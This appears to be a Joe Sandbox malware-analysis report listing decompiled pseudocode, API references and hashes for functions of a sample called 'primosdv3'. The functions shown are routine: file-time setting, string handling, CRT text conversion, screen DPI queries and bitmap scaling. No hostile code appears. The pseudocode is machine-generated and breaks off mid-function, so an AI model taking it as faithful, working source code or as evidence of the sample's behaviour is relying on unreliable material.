0x00c6a43e
0x00c6a444
0x00c6a44b
0x00000000
0x00000000
0x00000000
0x00c6a44b
0x00c6a407
0x00c6a3ac
0x00c6a3b0
0x00000000
0x00000000
0x00000000
0x00c6a3b0
0x00c6a391
0x00c6a395
0x00000000
0x00000000
0x00000000
0x00c6a395
0x00c6a377
0x00c6a37b
0x00000000
0x00000000
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00C67F69,?,?,?), ref: 00C6A3FA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00C67F69,?), ref: 00C6A43E
SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00C67F69,?,?,?,?,?,?,?), ref: 00C6A4BF
CloseHandle.KERNEL32(?,?,?,00000800,?,00C67F69,?,?,?,?,?,?,?,?,?,?), ref: 00C6A4C6

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: cb0c1970733da8c8e9b2eafcc922dc2e0cfdda420ceff3e4d3bfd02f14cb177b
Instruction ID: c5d1e0f5931193ad398033d0c6a3e599a3db883f008b3ca9a6020e996ac2ac6b
Opcode Fuzzy Hash: cb0c1970733da8c8e9b2eafcc922dc2e0cfdda420ceff3e4d3bfd02f14cb177b
Instruction Fuzzy Hash: 5B41AF312483819AD731DF24DC89FAEBBE4AF85700F044919F5E5A3291DAA4DB48DF53

Uniqueness

Uniqueness Score: -1.00%

Function 00C61100 Relevance: 6.1, APIs: 4, Instructions: 119
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E00C61100(intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v60;
				short* _v64;
				char* _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v92;
				char _v1114;
				char _v1116;
				void* __edi;
				signed int _t44;
				signed int _t52;
				intOrPtr _t67;
				short* _t80;
				void* _t83;
				char _t84;
				signed int _t85;
				void* _t87;
				signed int _t97;

				_t79 = _a16;
				_t81 =  &_v1116;
				if(_a16 != 0) {
					E00C70602( &_v1116, _t79, 0x200);
					_t87 =  &_v1114 + E00C83E13( &_v1116) * 2;
					E00C70602(_t87, _t79, 0x200 - (_t87 -  &_v1116 >> 1));
					_t81 = _t87 + E00C83E13(_t87) * 2 + 2;
				}
				E00C70602(_t81, E00C6E617(0xa3), 0x200 - (_t81 -  &_v1116 >> 1));
				_t83 = _t81 + E00C83E13(_t81) * 2 + 2;
				E00C70602(_t83, 0xc935f0, 0x200 - (_t83 -  &_v1116 >> 1));
				_t44 = E00C83E13(_t83);
				 *((short*)(_t83 + 2 + _t44 * 2)) = 0;
				_t84 = 0x58;
				E00C7FFF0(_t79,  &_v92, 0, _t84);
				_t67 = _a20;
				_t80 = _a12;
				_v88 = _a4;
				_v84 =  *0xca1028;
				_v80 =  &_v1116;
				_v44 = _a8;
				_v92 = _t84;
				_v64 = _t80;
				_v60 = 0x800;
				_v40 = 0x1080c;
				_push( &_v92);
				if(_t67 == 0) {
					_t52 =  *0xcc3044();
				} else {
					_t52 =  *0xcc303c();
				}
				_t85 = _t52;
				if(_t85 == 0) {
					_t52 =  *0xcc3040();
					if(_t52 == 0x3002) {
						 *_t80 = 0;
						_push( &_v92);
						if(_t67 == 0) {
							_t52 =  *0xcc3044();
						} else {
							_t52 =  *0xcc303c();
						}
						_t85 = _t52;
					}
					_t97 = _t85;
				}
				return _t52 & 0xffffff00 | _t97 != 0x00000000;
			}

0x00c6110c
0x00c6110f
0x00c6111c
0x00c61123
0x00c61137
0x00c6114d
0x00c6115c
0x00c6115c
0x00c6117c
0x00c61191
0x00c611a3
0x00c611a9
0x00c611b2
0x00c611ba
0x00c611be
0x00c611c9
0x00c611cc
0x00c611cf
0x00c611d7
0x00c611e0
0x00c611e6
0x00c611ec
0x00c611ef
0x00c611f2
0x00c611f9
0x00c61200
0x00c61203
0x00c6120d
0x00c61205
0x00c61205
0x00c61205
0x00c61213
0x00c61217
0x00c61219
0x00c61224
0x00c61228
0x00c6122e
0x00c61231
0x00c6123b
0x00c61233
0x00c61233
0x00c61233
0x00c61241
0x00c61241
0x00c61243
0x00c61243
0x00c6124c

APIs

_wcslen.LIBCMT ref: 00C6112B
_wcslen.LIBCMT ref: 00C61153
_wcslen.LIBCMT ref: 00C61182
_wcslen.LIBCMT ref: 00C611A9

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 8f90cae19fe7d76a1812f6c8311dc531988c748fbd6c0d45c75083341f738e9f
Instruction ID: 7379d04a4122755247d0b3f3859f65f56ef9b1c1477bcecdc640fea4161e26cc
Opcode Fuzzy Hash: 8f90cae19fe7d76a1812f6c8311dc531988c748fbd6c0d45c75083341f738e9f
Instruction Fuzzy Hash: 4141C3B19006699BCB21AF68CC5AAEF7BB8EF01311F044029FD45F7241DB30AE558BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00C8C988 Relevance: 6.1, APIs: 4, Instructions: 110
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E00C8C988(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t54;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t66;
				short* _t67;
				signed int _t68;
				short* _t69;

				_t65 = __edx;
				_t34 =  *0xc9e7ac; // 0x2b9f4dac
				_v8 = _t34 ^ _t68;
				E00C84636(_t55,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t6 = _v24 + 8; // 0x2de85006
					_t54 =  *_t6;
					_t57 = _t54;
					_a24 = _t54;
				}
				_t66 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E00C7FBBC(_t66, _t55, _v8 ^ _t68, _t65, _t66, _t67);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t67 = 0;
					L11:
					if(_t67 != 0) {
						E00C7FFF0(_t66, _t67, _t66, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t67, _v12);
						if(_t46 != 0) {
							_t66 = GetStringTypeW(_a8, _t67, _t46, _a20);
						}
					}
					L14:
					E00C8ABC3(_t67);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t67 = E00C88E06(_t63, _t48 & _t63);
					if(_t67 == 0) {
						goto L14;
					}
					 *_t67 = 0xdddd;
					L9:
					_t67 =  &(_t67[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00C92010(_t48 & _t63);
				_t67 = _t69;
				if(_t67 == 0) {
					goto L14;
				}
				 *_t67 = 0xcccc;
				goto L9;
			}

0x00c8c988
0x00c8c990
0x00c8c997
0x00c8c9a3
0x00c8c9a8
0x00c8c9ad
0x00c8c9b2
0x00c8c9b2
0x00c8c9b5
0x00c8c9b7
0x00c8c9b7
0x00c8c9bc
0x00c8c9d5
0x00c8c9db
0x00c8c9e0
0x00c8ca7f
0x00c8ca83
0x00c8ca88
0x00c8ca88
0x00c8caa4
0x00c8caa4
0x00c8c9e6
0x00c8c9ee
0x00c8c9f2
0x00c8ca3e
0x00c8ca40
0x00c8ca42
0x00c8ca47
0x00c8ca5e
0x00c8ca66
0x00c8ca76
0x00c8ca76
0x00c8ca66
0x00c8ca78
0x00c8ca79
0x00000000
0x00c8ca7e
0x00c8c9f9
0x00c8c9fb
0x00c8c9fd
0x00c8ca05
0x00c8ca22
0x00c8ca2c
0x00c8ca31
0x00000000
0x00000000
0x00c8ca33
0x00c8ca39
0x00c8ca39
0x00000000
0x00c8ca39
0x00c8ca09
0x00c8ca0d
0x00c8ca12
0x00c8ca16
0x00000000
0x00000000
0x00c8ca18
0x00000000

APIs

MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,00C847C6,00000000,00000000,00C857FB,?,00C857FB,?,00000001,00C847C6,2DE85006,00000001,00C857FB,00C857FB), ref: 00C8C9D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C8CA5E
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00C8CA70
__freea.LIBCMT ref: 00C8CA79

Part of subcall function 00C88E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C84286,?,0000015D,?,?,?,?,00C85762,000000FF,00000000,?,?), ref: 00C88E38

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 7776c51e2815c8afe70e4a4721c27d1641ee74054fd93adc3431a6c37a696f88
Instruction ID: 985ea1c5133df5a1398fffc9328b09be6462d517dd5b69af4b208bce9fc692d5
Opcode Fuzzy Hash: 7776c51e2815c8afe70e4a4721c27d1641ee74054fd93adc3431a6c37a696f88
Instruction Fuzzy Hash: 4C31A072A0021AABDF28EF64DC85EEE7BA5EB01314B044169FC14E7150E735DE50EBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00C7A663 Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7A663() {
				struct HDC__* _t1;
				struct HDC__* _t5;

				_t1 = GetDC(0);
				_t5 = _t1;
				if(_t5 != 0) {
					 *0xca8430 = GetDeviceCaps(_t5, 0x58);
					 *0xca8434 = GetDeviceCaps(_t5, 0x5a);
					return ReleaseDC(0, _t5);
				}
				return _t1;
			}

0x00c7a666
0x00c7a66c
0x00c7a670
0x00c7a67e
0x00c7a68c
0x00000000
0x00c7a691
0x00c7a698

APIs

GetDC.USER32(00000000), ref: 00C7A666
GetDeviceCaps.GDI32(00000000,00000058), ref: 00C7A675
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C7A683
ReleaseDC.USER32(00000000,00000000), ref: 00C7A691

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 5b8d861bb9e5224ea53074ec79f98fdf0b3fda5790f6f4944606e8b9d1616a97
Instruction ID: 37fe67bd444418f53aac45912b588669c053093d25b5332a0ee8e86c80ae3bf0
Opcode Fuzzy Hash: 5b8d861bb9e5224ea53074ec79f98fdf0b3fda5790f6f4944606e8b9d1616a97
Instruction Fuzzy Hash: 02E01233942761B7D3616B60FD1DF8F3E54FB0AB52F018501FB05961D0DB7486048BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00C7A80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00C7A80C(void* __edx, long long __fp0, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v0;
				signed int _v4;
				void _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v84;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				void* _v112;
				char _v116;
				char _v120;
				short _v122;
				short _v124;
				signed int _v128;
				intOrPtr _v132;
				signed int _v136;
				char _v140;
				intOrPtr* _v144;
				char _v156;
				intOrPtr* _v164;
				intOrPtr* _v168;
				intOrPtr _v176;
				char _v180;
				char _v184;
				intOrPtr* _v196;
				intOrPtr _v212;
				signed int _v216;
				signed int _v220;
				void* _v224;
				char _v228;
				intOrPtr _v232;
				intOrPtr* _v236;
				intOrPtr* _v244;
				void* _v256;
				void* _v260;
				intOrPtr* _v268;
				intOrPtr* _t94;
				void* _t96;
				intOrPtr* _t97;
				signed int _t100;
				intOrPtr* _t103;
				intOrPtr* _t106;
				short _t114;
				intOrPtr _t117;
				intOrPtr* _t118;
				intOrPtr* _t121;
				intOrPtr* _t124;
				intOrPtr* _t130;
				signed int _t133;
				intOrPtr* _t139;
				intOrPtr* _t143;
				void* _t148;
				signed int _t150;
				intOrPtr* _t156;
				intOrPtr* _t166;
				intOrPtr* _t169;
				char _t180;
				void* _t182;
				intOrPtr* _t186;
				signed int _t198;
				long long* _t202;
				long long _t204;

				_t204 = __fp0;
				_t202 =  &_v112;
				if(E00C7A699() != 0) {
					_t148 = _a4;
					GetObjectW(_t148, 0x18,  &_v68);
					_t150 = _v4;
					asm("cdq");
					_t198 = _v72 * _t150 / _v76;
					if(_t198 >= _v0) {
						_t198 = _v0;
					}
					if(_t150 != _v76 || _t198 != _v72) {
						_t180 = 0;
						_push( &_v124);
						_push(0xc94754);
						_push(1);
						_push(0);
						_push(0xc9555c);
						if( *0xcc3188() >= 0) {
							_t94 = _v144;
							 *0xc93278(_t94, _t148, 0, 2,  &_v140, _t182);
							_t96 =  *((intOrPtr*)( *_t94 + 0x54))();
							_t97 = _v164;
							if(_t96 < 0) {
								L14:
								 *0xc93278(_t97);
								 *((intOrPtr*)( *((intOrPtr*)( *_t97 + 8))))();
								L21:
								_t100 =  *0xcc30e4(_t148, _t180, _t180, _t180, _t180);
								L22:
								goto L23;
							}
							_v156 = 0;
							_t186 =  *((intOrPtr*)( *_t97 + 0x28));
							_t156 = _t186;
							 *0xc93278(_t97,  &_v156);
							if( *_t186() < 0) {
								L13:
								_t103 = _v168;
								 *0xc93278(_t103);
								 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 8))))();
								_t97 = _v176;
								goto L14;
							}
							_t106 = _v164;
							asm("fldz");
							 *_t202 = _t204;
							 *0xc93278(_t106, _v168, 0xc9556c, 0, 0, _t156, _t156, 0);
							if( *((intOrPtr*)( *_t106 + 0x20))() >= 0) {
								_v132 = _v84;
								_v116 = 0;
								_v128 =  ~_t198;
								_v112 = 0;
								_v124 = 1;
								_t114 = 0x20;
								_v122 = _t114;
								_v108 = 0;
								_v104 = 0;
								_v100 = 0;
								_v96 = 0;
								_v136 = 0x28;
								_v120 = 0;
								_v184 = 0;
								_t117 =  *0xcc3058(0,  &_v136, 0,  &_v180, 0, 0);
								_v212 = _t117;
								if(_t117 != 0) {
									_t166 = _v228;
									 *0xc93278(_t166,  &_v216);
									 *((intOrPtr*)( *((intOrPtr*)( *_t166 + 0x2c))))();
									_t130 = _v224;
									 *0xc93278(_t130, _v232, _v116, _t198, 3);
									 *((intOrPtr*)( *_t130 + 0x20))();
									_t133 = _v136;
									_t169 = _v244;
									_v216 = _t198;
									_v220 = _t133;
									_v228 = 0;
									_v224 = 0;
									 *0xc93278(_t169,  &_v228, _t133 << 2, _t198 * _t133 << 2, _v232);
									if( *((intOrPtr*)( *_t169 + 0x1c))() < 0) {
										DeleteObject(_v260);
									} else {
										_v256 = _v260;
									}
									_t139 = _v268;
									 *0xc93278(_t139);
									 *((intOrPtr*)( *((intOrPtr*)( *_t139 + 8))))();
								}
								_t118 = _v224;
								 *0xc93278(_t118);
								 *((intOrPtr*)( *((intOrPtr*)( *_t118 + 8))))();
								_t121 = _v224;
								 *0xc93278(_t121);
								 *((intOrPtr*)( *((intOrPtr*)( *_t121 + 8))))();
								_t124 = _v236;
								 *0xc93278(_t124);
								 *((intOrPtr*)( *((intOrPtr*)( *_t124 + 8))))();
								_t100 = _v220;
								if(_t100 != 0) {
									goto L22;
								} else {
									goto L21;
								}
							}
							_t143 = _v196;
							 *0xc93278(_t143);
							 *((intOrPtr*)( *((intOrPtr*)( *_t143 + 8))))();
							goto L13;
						}
						goto L8;
					} else {
						_t180 = 0;
						L8:
						_t100 =  *0xcc30e4(_t148, _t180, _t180, _t180, _t180);
						L23:
						return _t100;
					}
				}
				_push(_a12);
				_push(_a8);
				_push(_a4);
				return E00C7AAC9();
			}

0x00c7a80c
0x00c7a80c
0x00c7a816
0x00c7a82f
0x00c7a83c
0x00c7a846
0x00c7a850
0x00c7a855
0x00c7a85e
0x00c7a860
0x00c7a860
0x00c7a86c
0x00c7a87c
0x00c7a87e
0x00c7a87f
0x00c7a887
0x00c7a888
0x00c7a889
0x00c7a896
0x00c7a8a8
0x00c7a8bc
0x00c7a8c2
0x00c7a8c7
0x00c7a8cb
0x00c7a940
0x00c7a948
0x00c7a94e
0x00c7aab4
0x00c7aab9
0x00c7aabf
0x00000000
0x00c7aabf
0x00c7a8cd
0x00c7a8d9
0x00c7a8dc
0x00c7a8de
0x00c7a8e8
0x00c7a928
0x00c7a928
0x00c7a934
0x00c7a93a
0x00c7a93c
0x00000000
0x00c7a93c
0x00c7a8ea
0x00c7a8ee
0x00c7a8f5
0x00c7a907
0x00c7a912
0x00c7a95c
0x00c7a964
0x00c7a968
0x00c7a971
0x00c7a975
0x00c7a97a
0x00c7a97d
0x00c7a98c
0x00c7a995
0x00c7a99c
0x00c7a9a3
0x00c7a9aa
0x00c7a9b2
0x00c7a9b6
0x00c7a9ba
0x00c7a9c0
0x00c7a9c6
0x00c7a9cc
0x00c7a9dd
0x00c7a9e3
0x00c7a9e5
0x00c7a9fd
0x00c7aa03
0x00c7aa06
0x00c7aa11
0x00c7aa15
0x00c7aa1c
0x00c7aa23
0x00c7aa27
0x00c7aa3b
0x00c7aa46
0x00c7aa56
0x00c7aa48
0x00c7aa4c
0x00c7aa4c
0x00c7aa5c
0x00c7aa68
0x00c7aa6e
0x00c7aa6e
0x00c7aa70
0x00c7aa7c
0x00c7aa82
0x00c7aa84
0x00c7aa90
0x00c7aa96
0x00c7aa98
0x00c7aaa4
0x00c7aaaa
0x00c7aaac
0x00c7aab2
0x00000000
0x00000000
0x00000000
0x00000000
0x00c7aab2
0x00c7a914
0x00c7a920
0x00c7a926
0x00000000
0x00c7a926
0x00000000
0x00c7a874
0x00c7a874
0x00c7a898
0x00c7a89d
0x00c7aac0
0x00000000
0x00c7aac2
0x00c7a86c
0x00c7a818
0x00c7a81c
0x00c7a820
0x00000000

APIs

Part of subcall function 00C7A699: GetDC.USER32(00000000), ref: 00C7A69D
Part of subcall function 00C7A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C7A6A8
Part of subcall function 00C7A699: ReleaseDC.USER32(00000000,00000000), ref: 00C7A6B3

GetObjectW.GDI32(?,00000018,?), ref: 00C7A83C

Part of subcall function 00C7AAC9: GetDC.USER32(00000000), ref: 00C7AAD2
Part of subcall function 00C7AAC9: GetObjectW.GDI32(?,00000018,?,?,?,?,?,?,?,?,?,00C7A829,?,?,?), ref: 00C7AB01
Part of subcall function 00C7AAC9: ReleaseDC.USER32(00000000,?), ref: 00C7AB99

Strings

(, xrefs: 00C7A9AA

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: a81a774b2278deddb1586c407a0c0188cd29b3cac2edbcd18c938b79e4deb7a1
Instruction ID: a6faa71342f053fd9858cf46e6daf9592b9dc26b4e48b90898e4c9d87816c5f9
Opcode Fuzzy Hash: a81a774b2278deddb1586c407a0c0188cd29b3cac2edbcd18c938b79e4deb7a1
Instruction Fuzzy Hash: EA91CF71608794AFD710DF25D848A2FBBE8FBC9710F00891EF59AD3261DB30A945CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00C8B1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00C8B1B8(signed int _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				char _v6;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v36;
				intOrPtr* _v64;
				intOrPtr _v96;
				intOrPtr* _v100;
				CHAR* _v104;
				signed int _v116;
				char _v290;
				signed int _v291;
				struct _WIN32_FIND_DATAA _v336;
				union _FINDEX_INFO_LEVELS _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t80;
				signed int _t82;
				signed int _t87;
				signed int _t91;
				signed int _t93;
				signed int _t95;
				signed int _t96;
				signed int _t100;
				signed int _t103;
				signed int _t108;
				signed int _t111;
				intOrPtr _t113;
				signed char _t115;
				union _FINDEX_INFO_LEVELS _t123;
				signed int _t128;
				signed int _t131;
				void* _t136;
				void* _t138;
				signed int _t139;
				signed int _t142;
				signed int _t144;
				signed int _t146;
				signed int* _t147;
				signed int _t150;
				void* _t153;
				CHAR* _t154;
				void* _t155;
				char _t157;
				char _t159;
				intOrPtr* _t162;
				void* _t163;
				intOrPtr* _t164;
				signed int _t166;
				void* _t168;
				intOrPtr* _t169;
				signed int _t173;
				signed int _t177;
				signed int _t178;
				intOrPtr* _t183;
				void* _t192;
				signed int _t194;
				signed int _t195;
				signed int _t197;
				signed int _t198;
				signed int _t200;
				union _FINDEX_INFO_LEVELS _t201;
				void* _t202;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				void* _t211;
				intOrPtr _t212;
				void* _t213;
				void* _t214;
				signed int _t217;
				void* _t219;
				signed int _t220;
				void* _t221;
				void* _t222;
				void* _t223;
				signed int _t224;
				void* _t225;
				void* _t226;

				_t80 = _a8;
				_t222 = _t221 - 0x20;
				if(_t80 != 0) {
					_t206 = _a4;
					_t159 = 0;
					 *_t80 = 0;
					_t197 = 0;
					_t150 = 0;
					_v36 = 0;
					_v336.cAlternateFileName = 0;
					_v28 = 0;
					__eflags =  *_t206;
					if( *_t206 == 0) {
						L9:
						_v12 = _v12 & 0x00000000;
						_t82 = _t150 - _t197;
						_v8 = _t159;
						_t190 = (_t82 >> 2) + 1;
						__eflags = _t150 - _t197;
						_v16 = (_t82 >> 2) + 1;
						asm("sbb esi, esi");
						_t208 =  !_t206 & _t82 + 0x00000003 >> 0x00000002;
						__eflags = _t208;
						if(_t208 != 0) {
							_t195 = _t197;
							_t157 = _t159;
							do {
								_t183 =  *_t195;
								_t17 = _t183 + 1; // 0x1
								_v8 = _t17;
								do {
									_t142 =  *_t183;
									_t183 = _t183 + 1;
									__eflags = _t142;
								} while (_t142 != 0);
								_t157 = _t157 + 1 + _t183 - _v8;
								_t195 = _t195 + 4;
								_t144 = _v12 + 1;
								_v12 = _t144;
								__eflags = _t144 - _t208;
							} while (_t144 != _t208);
							_t190 = _v16;
							_v8 = _t157;
							_t150 = _v336.cAlternateFileName;
						}
						_t209 = E00C88207(_t190, _v8, 1);
						_t223 = _t222 + 0xc;
						__eflags = _t209;
						if(_t209 != 0) {
							_t87 = _t209 + _v16 * 4;
							_v20 = _t87;
							_t191 = _t87;
							_v16 = _t87;
							__eflags = _t197 - _t150;
							if(_t197 == _t150) {
								L23:
								_t198 = 0;
								__eflags = 0;
								 *_a8 = _t209;
								goto L24;
							} else {
								_t93 = _t209 - _t197;
								__eflags = _t93;
								_v24 = _t93;
								do {
									_t162 =  *_t197;
									_v12 = _t162 + 1;
									do {
										_t95 =  *_t162;
										_t162 = _t162 + 1;
										__eflags = _t95;
									} while (_t95 != 0);
									_t163 = _t162 - _v12;
									_t35 = _t163 + 1; // 0x1
									_t96 = _t35;
									_push(_t96);
									_v12 = _t96;
									_t100 = E00C8F101(_t163, _t191, _v20 - _t191 + _v8,  *_t197);
									_t223 = _t223 + 0x10;
									__eflags = _t100;
									if(_t100 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E00C89097();
										asm("int3");
										_t219 = _t223;
										_push(_t163);
										_t164 = _v64;
										_t47 = _t164 + 1; // 0x1
										_t192 = _t47;
										do {
											_t103 =  *_t164;
											_t164 = _t164 + 1;
											__eflags = _t103;
										} while (_t103 != 0);
										_push(_t197);
										_t200 = _a8;
										_t166 = _t164 - _t192 + 1;
										_v12 = _t166;
										__eflags = _t166 - (_t103 | 0xffffffff) - _t200;
										if(_t166 <= (_t103 | 0xffffffff) - _t200) {
											_push(_t150);
											_t50 = _t200 + 1; // 0x1
											_t153 = _t50 + _t166;
											_t211 = E00C8B136(_t166, _t153, 1);
											_t168 = _t209;
											__eflags = _t200;
											if(_t200 == 0) {
												L34:
												_push(_v12);
												_t153 = _t153 - _t200;
												_t108 = E00C8F101(_t168, _t211 + _t200, _t153, _v0);
												_t224 = _t223 + 0x10;
												__eflags = _t108;
												if(__eflags != 0) {
													goto L37;
												} else {
													_t136 = E00C8B587(_a12, _t192, __eflags, _t211);
													E00C88DCC(0);
													_t138 = _t136;
													goto L36;
												}
											} else {
												_push(_t200);
												_t139 = E00C8F101(_t168, _t211, _t153, _a4);
												_t224 = _t223 + 0x10;
												__eflags = _t139;
												if(_t139 != 0) {
													L37:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E00C89097();
													asm("int3");
													_push(_t219);
													_t220 = _t224;
													_t225 = _t224 - 0x150;
													_t111 =  *0xc9e7ac; // 0x2b9f4dac
